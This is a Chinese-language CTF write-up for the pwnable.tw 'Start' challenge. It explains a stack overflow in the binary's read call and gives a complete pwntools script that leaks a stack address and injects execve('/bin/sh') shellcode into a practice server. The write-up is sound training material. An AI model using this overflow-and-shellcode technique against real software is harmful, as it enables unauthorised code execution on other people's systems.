Pwnable.tw Start

参考了这篇writeup  http://dogewatch.github.io/2017/04/10/pwnable.tw-Part1/

拿到binary拖到ida里看一下，只有两个函数，一个_start，一个_exit。

直接通过 int 80h 进行系统调用

linux syscall的资料在这里

把这段汇编翻译成c

void_start(){

    charbuf[20]='Let'sstarttheCTF:';

    sys_write(1,buf,20);

    sys_read(0,buf,60);

}

void_exit(){

    sys_exit();

}

这里有个坑是用peda 的checksec显示NX是开启状态，但实际栈是可执行的

read有溢出，所以大概的思路是先泄露栈地址 然后往栈上写shellcode并执行

栈结构：

/  saved esp  /

/    ret addr    /

/                    /

20 bytes buffer

/                    /

发现当第一次ret后，esp正好指向saved esp 此时若跳转到mov ecx，esp处可以泄露

saved esp的值，接下来写shellcode 构造payload就行了 这里需要注意的是在第二次ret前

add esp 14h

因此payload要先填充20byte的字符

而且不知道为什么用pwntools生成的shellcode打过去没效果

利用脚本如下

from pwn import *

context.log_level="debug"

s= remote('chall.pwnable.tw',10000)

addr_1 = p32(0x08048087) # mov ecx, esp

shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'

#0:  31 c9                  xor    ecx,ecx

#2:  f7 e1                  mul    ecx

#4:  51                      push  ecx

#5:  68 2f 2f 73 68          push  0x68732f2f

#a:  68 2f 62 69 6e          push  0x6e69622f

#f:  89 e3                  mov    ebx,esp

#11:  b0 0b                  mov    al,0xb

#13:  cd 80                  int    0x80

#shellcode = asm(shellcraft.i386.sh())

def leak():

    recv = s.recvuntil(':')

    payload = 'a'*20 + addr_1

     s.send(payload)

    stack_addr = s.recv(4)

    print 'stack address is : ' + hex(u32(stack_addr))

    return u32(stack_addr)

def pwn(addr):

    payload =  "a"*20+p32(addr+20)  + shellcode

    s.send(payload)

addr_2 = leak()

pwn(addr_2)

s.interactive()